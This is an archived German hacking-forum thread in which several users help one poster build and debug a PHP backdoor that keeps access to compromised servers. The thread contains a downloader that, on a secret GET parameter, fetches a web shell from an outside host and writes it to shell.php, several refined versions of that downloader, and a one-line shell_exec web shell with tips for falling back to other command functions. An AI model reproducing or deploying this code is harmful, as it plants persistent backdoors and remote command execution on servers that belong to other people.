PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : backdoorscript will nicht ganz


PoLe
23.10.2011, 18:18
also ich hab keine lust mehr, dass meine shells andauernd deleted werden also hab ich beschlossen mir ein backdoor script zu basteln :



<?php
if($_GET['rykou']){
$file = fopen("shell.php","w+");
$stream = fopen ("http://usuarios.multimania.es/pilotcast/Locus7Shell.txt", "r");
while(!feof($stream)) {
$shell .=fgets($stream);
}
fwrite($file, $shell); fclose($file);}
?>

das problem ist, dass es lokal funktioniert aber bei einigen funzt das eben nicht da kommen dann fehler wie:



Warning: Unexpected character in input: ' in /proc/30851/environ on line 1

Parse error: syntax error, unexpected T_STRING in /proc/30851/environ on line 1



jemand ne idee? ich vermute mal es hat was mit magic quotes zutun weil er wegen string rumheult...
VeN0m
23.10.2011, 19:36
Ich würde es nicht über das Öffnen von URLs machen, sondern eher so:



<?php

if($_GET["rykou"]) {

$f = fopen("shell.php","w+");
fwrite($f,file_get_contents("http://usuarios.multimania.es/pilotcast/Locus7Shell.txt"));
fclose($f);

}

?>


Ist denke ich fehlerunanfälliger.
PoLe
24.10.2011, 19:36
if($_GET+++91;"rykou"+++93;)

kannst mir den mal erklären?:D
Notorious
24.10.2011, 19:42
if($_GET+++91;"rykou"+++93;)

kannst mir den mal erklären?:D

Vbulletin zerstört den kot. VeN0m poste dein kot mit [CODE] tags :D
VeN0m
24.10.2011, 21:42
Mh, also als ich noch Mod war ging der PHP-Tag noch. Also:



<?php

if($_GET["rykou"]) {

$f = fopen("shell.php","w+");
fwrite($f,file_get_contents("http://usuarios.multimania.es/pilotcast/Locus7Shell.txt"));
fclose($f);

}

?>
inout
24.10.2011, 21:53
Dann könnte man es aber auch gleich so machen:

if(isset($_GET['rykou'])) file_put_contents('shell.php', file_get_contents('http://usuarios.multimania.es/pilotcast/Locus7Shell.txt'))
VeN0m
25.10.2011, 16:52
Sicher, aber ich bevorzuge immer noch die lange Version - frag' nicht wieso ^^.
hoohead
26.10.2011, 21:46
Für "Administrative Jobs" kann man quasi auch shell_exec nutzen.


<?php $output = shell_exec($_GET['hoo']); echo “<pre>$output</pre>”; ?>
Vorausgesetzt die entsprechenden Serverkonfigurationen lassen ein shell_exec zu (PHP Safe Mode deaktiviert etc.).
VeN0m
27.10.2011, 16:08
Ich würde bei shell_exec dann aber mit is_callable("shell_exec") prüfen, ob die Funktion aufrufbar ist. Wenn nicht, dasselbe für system, passthru und/oder exec probieren.
PoLe
05.11.2011, 14:19
hab schon verstanden, ich mach das dingens neu:D